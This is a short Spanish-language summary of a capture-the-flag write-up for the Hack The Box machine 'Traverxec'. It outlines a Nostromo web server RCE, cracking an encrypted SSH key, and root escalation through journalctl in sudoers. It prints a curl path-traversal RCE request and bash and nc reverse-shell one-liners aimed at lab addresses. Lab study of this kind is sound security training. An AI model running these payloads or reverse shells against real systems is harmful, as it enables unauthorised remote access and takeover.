# Traverxec

### Resumen de la resolución

* Explotación de un servidor web Nostromo mediante el uso de un script encontrado en exploit-db
* Extracción de id\_rsa analizando la estructura de archivos del servidor web Nostromo
* Acceso a la máquina víctima crackeando la contraseña de la id\_rsa encriptada
* Escalada de privilegios a root abusando de un binario journalctl on permisos configurados en el sudoers

### Habilidades adquiridas

* Capacidad de replicar un script de Ruby que abusa de una vulnerabilidad tipo RCE que hace uso de un *path traversal* mediante una petición por post con Curl

```
curl -s -X POST "http://10.10.10.165/.%0d./.%0d./.%0d./.%0d./bin/sh" -d '/usr/bin/ping -c 1 10.10.14.29'
```

### Comandos y herramientas destacables

* Sintáxis de nc y bash para enviar una Reverse Shell

```
bash -c "bash -i &> /dev/tcp/10.10.14.2/4242 0>&1"
nc -e /bin/bash 10.10.14.2 4242
```

### Walkthrough en YouTube:

{% embed url="<https://youtu.be/CiBlBzTG0M4>" %}
